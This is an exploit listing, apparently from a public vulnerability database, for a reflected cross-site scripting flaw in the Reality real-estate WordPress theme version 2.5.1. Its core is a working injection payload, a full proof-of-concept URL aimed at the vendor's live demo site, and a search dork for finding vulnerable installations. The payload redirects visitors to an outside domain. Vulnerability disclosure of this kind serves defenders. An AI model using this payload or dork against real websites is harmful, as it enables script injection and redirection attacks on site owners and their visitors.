Reality | Estate Multipurpose WordPress Theme v2.5.1 Reflected XSS

2020.01.16
ru m0ze (RU) ru
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Reality | Estate Multipurpose WordPress Theme v2.5.1 Reflected XSS # Google Dork: /wp-content/themes/reality/ # Date: 13/01/2020 # Exploit Author: m0ze # Vendor Homepage: https://inwavethemes.com/ # Software Link: https://themeforest.net/item/reality-real-estate-wordpress-theme/21627776 # Version: 2.5.1 # Tested on: Kali Linux # CVE: - # CWE: 79 ----[]- Info: -[]---- Demo website: http://reality.inwavethemes.com/ ----[]- Reflected XSS: -[]---- Payload Sample: "><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//"> PoC: http://reality.inwavethemes.com/properties/?status=&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//%22%3E&type=&from-year=&to-year=&min-price=&max-price=&bathrooms=&bedrooms=&garages=&min-garages_size=&max-garages_size=&min-land_size=&max-land_size=


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top